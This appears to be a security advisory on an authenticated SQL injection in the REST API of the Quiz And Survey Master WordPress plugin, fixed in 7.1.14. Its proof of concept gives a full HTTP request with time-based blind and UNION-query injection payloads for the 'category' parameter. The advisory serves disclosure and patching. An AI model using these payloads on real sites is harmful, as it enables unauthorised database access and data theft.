Quiz And Survey Master < 7.1.14 - Authenticated SQL injection via Rest API
Description
While confirming https://wpscan.com/vulnerability/3b52b25c-82a1-41c7-83ac-92e244f7c5ab, another SQLi issue was identified and reported. The qsm_rest_get_bank_questions() function in the php/rest-api.php file did not property sanitise and escape the category parameter before using it in SQL statements passed to the get_row() and get_results() DB calls, allowing users with the edit_post capability (author+) to perform SQL injections. Other SQLi issues were also identified by the WordPress plugin team
Proof of Concept
GET /wp-json/quiz-survey-master/v1/bank_questions/1?category=a'%20AND%20(SELECT%201950%20FROM%20(SELECT(SLEEP(5)))ckOq)--%20IYpy HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-WP-Nonce: 2d1236068d
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [account with edit_post capability (author+)]
---
Parameter: category (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=a' AND (SELECT 1950 FROM (SELECT(SLEEP(5)))ckOq)-- IYpy
Type: UNION query
Title: Generic UNION query (NULL) - 27 columns
Payload: category=a' UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7871,0x4c65426b7873415142526c6e6c726a61504b4976786f5a7850744a6a78527a69667a486964675262,0x7176786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
Affects Plugins
Fixed in version 7.1.14✓
Classification
Miscellaneous
Timeline
Publicly Published
2021-03-26 (about 7 months ago)
Added
2021-03-26 (about 7 months ago)
Last Updated
2021-03-26 (about 7 months ago)